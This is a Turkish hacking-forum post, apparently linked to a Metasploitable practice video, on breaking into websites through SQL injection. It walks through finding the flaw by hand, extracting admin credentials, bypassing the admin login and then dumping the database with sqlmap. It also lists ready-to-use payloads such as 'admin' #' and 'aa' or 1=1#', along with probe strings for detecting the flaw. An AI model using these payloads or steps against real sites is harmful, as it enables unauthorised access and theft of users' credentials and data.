Foruma hoş geldin, Ziyaretçi

Forum içeriğine ve tüm hizmetlerimize erişim sağlamak için foruma kayıt olmalı ya da giriş yapmalısınız. Foruma üye olmak tamamen ücretsizdir.

Botnet

Sabit kullanıcı
XGT 2 kullanıcı
Katılım
23 Haz 2019
Mesajlar
57
Sql injection 5 lwl ) Web sitesinde öncelikle sql zaafı deniyoruz manuel olarak ve bulduğumuz zaaflardan kullanıcı admin bilgilerini tek komut uygulayarak Tüm admin bilgilerini web sitesi üzerinde çıkartabiliyoruz ardından admin login kısmını bypass edip admin peneline girebiliyoruz ardından ise auto kullanarakta sqlmaptanda tüm databilgilere erişebiliriz yani hem manuel hemde auto yöntemini kullanıyoruz.

sql owasp10.png

Yaş kısıtlaması var tehdit olarak algılandı için youtubeden girmeniz gerekir

Youtube Link

Metasploitable Kurulumu : Web Sitesi Hacking / Sızma Testi İçin Kurmanız Gerekenler

Komutlar

admin' # (admin panel giriş bypass)

aa' or 1=1# (Admin bilgilerini çıkart)

Sql zaafını Tespit et
1'
'admin'__'
'+OR+1=1--
'OR1=1--'
'--
'--'



 

Forumda daha fazla yararlanmak için giriş yapın yada üye olun!

Forumdan daha fazla yararlanmak için giriş yapın veya kayıt olun!

Kayıt ol

Forumda bir hesap oluşturmak tamamen ücretsizdir.

Şimdi kayıt ol
Giriş yap

Eğer bir hesabınız var ise lütfen giriş yapın

Giriş yap